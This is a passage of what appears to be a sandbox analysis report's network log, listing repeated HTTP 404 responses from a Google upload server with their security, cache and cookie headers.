ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67GMKUIhA5mINk54_qAF4PoixC-UDc-GV1Bz4vaUxSV2wpGu9Lix23_eJOt9xZWz9EZn_0EwcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:24 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-f4b_mMyWaIgXN3GzfDXqyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP; expires=Tue, 01-Jul-2025 10:25:24 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7XiieQRc04AK74f-HHOxPyQ8uz2GNFoPLU-T-s-dj-Na3BKrn6y3r5DewtTX-bM7GWcaJXJzAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:24 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-3aD9-CNYblhsc-4QNMOJew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CnMTE8cnbgu3l_dQOP5JeZjAiv-iKXOObpP1z3dvj1TFJIOQ5URm5aFFaAL2FBTQUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jg1xiFdq0G9mwlzg40wuPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5QsWSPFT7-ai2Lw8XcgiylFdkg7Ps7VmTZLwocS-NCUR3fOxBYmn4y1wyAnFemT_X_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fcsdbU19w55fbotYIYA5ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6I5LGRmxxBcb7aYkVcEiGT5uDazQlk-Qq4tMReKqVC1LnDYVsSfdILU_vwfQykDLIYhNB3QfgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-O1rmXFS9PWgDEYk2PmgXQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75Sb2YdE01qEoYtK-CGmnrtJ5ZypjeEIaAX5oTTwQ5w1htS722y4P4LVM_DCXq4L71fgwo4D4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lXMAAz3TH2MTVRPmI9OivA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC72KVF_rzGcV1BOzqPIc5yLiZ9x2ybgmT-EA6iY7uwbUVwKHYtsapCg_6v0eX6f-9yAW8hC8Y0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wVVi4nQAcndS3W-7DrWy2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rO2k5PgJK2itYWkF34TGGYQ9c1iOcnxYJYoTJy-6kNJ9FHgFB-HGYBi4hTE84CPChContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zaRp3pI2J5oDpJcEl7ow0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zg4AQd-u56P6ySOM_rnyBmXpvD8v0hAfyJ4s99l9j9G7WaxB4m046OvnFJnB05sA8o3WUfM0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-NHUZSGUkvtQHnffHXaVdKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7e9H7ozF1IkuFVQd2cuI6EycA4afrGB52MLfoXKOe8nHrYyS6SnnbFSTWVlObWWvmsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Qjy_facuBzRPZ7xk7SbkvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC496NTgK6h3xMyBqWSTOASkXSKl3GnDYd9nasW8WRII1hElLU3ClkdR9bSe5uRUGiUAG82Nhp4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mYgoKkz3iu8UGoANOzWn6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jmVxbhKzSUIIMFEX3ZytixDiL3pADFVe1hXbxbncX_zXYotPCkL30PeGkRSTsKXg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-14sotBtS7tYQzdxzS66IRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7izHuar7uQ206L-xu-k3mj8LBhLHAY1kar-yZIWx6R1SlJEKFkJn_hhdGnfvonz0ZKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JzbTiofveld_1weHm55m-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7NKv4K7uh9icV8beG1G-C0nFwY04baUCzwiBoS13FCyi8UCB8PbDnBdtxAPOuT7V39Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-czx8Jis7tppnJ0wUUfRY7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zCl7tfIHxqfEFWxVOR4M0tSe-fW3xJufJFgxn7zqpNZc0CYz0GHNdt52jPby5ZSabContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-UrFnLCUNUMUPFdmOfrpI3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6-rT-TxuIr7G52EyUoMbYVuNEAtr-kYpZic6RN6H6FhZxgh7jFVMPzJa9LNK0Q1vJgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-lqiyxKo0SI86GbWsz8eq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global traffic
                              HTTP traffic detected: HTTP/1.1 404 Not Found
                                  X-GUploader-UploadID: AFiumC5R5opFDXBZDj_xFI2C1hgJm0xYjxTSUWTmPX91YVIMI1SvGlqsOUIwkNRlKSaTfwpl
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 10:25:36 GMT
                                  Content-Security-Policy: script-src 'report-sample' 'nonce--PuK1O-OFBCAmzE0SAdyoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Length: 1652
                                  Server: UploadServer
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                              Source: global traffic
                              HTTP traffic detected: HTTP/1.1 404 Not Found
                                  X-GUploader-UploadID: AFiumC7PVJPSoGwzHOoCGcY_qjYdov7cUW-0QHlkTqveU_wXLwtGVlxU4d2mFDjEIuqTQQZf55_Qok8
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 10:25:36 GMT
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-HMJpQcPy-1QNgBiJs3SXMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Length: 1652
                                  Server: UploadServer
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                              Source: global traffic
                              HTTP traffic detected: HTTP/1.1 404 Not Found
                                  X-GUploader-UploadID: AFiumC6DCeZRSCZBnMYPE1edPq1X3m8kNQxG7eWlBGQZXQGfT4Q49PKyoWG_CNL4JZ4DP6KZ4ojl5H0
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 10:25:45 GMT
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-n6jQ911SFKGqysCdV7hlaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Length: 1652
                                  Server: UploadServer
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                              Source: global traffic
                              HTTP traffic detected: HTTP/1.1 404 Not Found
                                  X-GUploader-UploadID: AFiumC5eDVm4gnhoXToAsRrwGR411mWAbquMNanYAnd2chTOwahN8CDwiDciH9BDNwduHXexKWVDz8g
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 10:25:45 GMT
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
